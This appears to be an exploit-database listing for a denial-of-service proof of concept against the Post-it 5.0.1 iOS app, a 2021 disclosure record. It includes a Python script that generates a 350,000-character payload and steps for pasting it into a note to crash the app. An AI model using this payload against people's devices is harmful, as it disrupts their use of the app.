header-logo
Suggest Exploit
vendor:
Post-it
by:
Geovanni Ruiz
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Post-it
Affected Version From: 5.0.1
Affected Version To: 5.0.1
Patch Exists: No
Related CWE: N/A
CPE: a:3m:post-it:5.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iOS
2021

Post-it 5.0.1 – Denial of Service (PoC)

Post-it is vulnerable to a DoS condition when a long list of characters is being used when creating a note. Successful exploitation will cause the application to stop working. The exploit has been tested against iOS 14.2.

Mitigation:

Ensure that the application is not vulnerable to DoS attacks by validating user input.
Source

Exploit-DB raw data:

# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/es/app/post-it/id920127738
# Version: 5.0.1
# Category: DoS (iOS)

##### Vulnerability #####

Post-it is vulnerable to a DoS condition when a long list of characters is
being used when creating a note:

# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new
payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed

Successful exploitation will cause the application to stop working.

I have been able to test this exploit against iOS 14.2.

##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000

try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")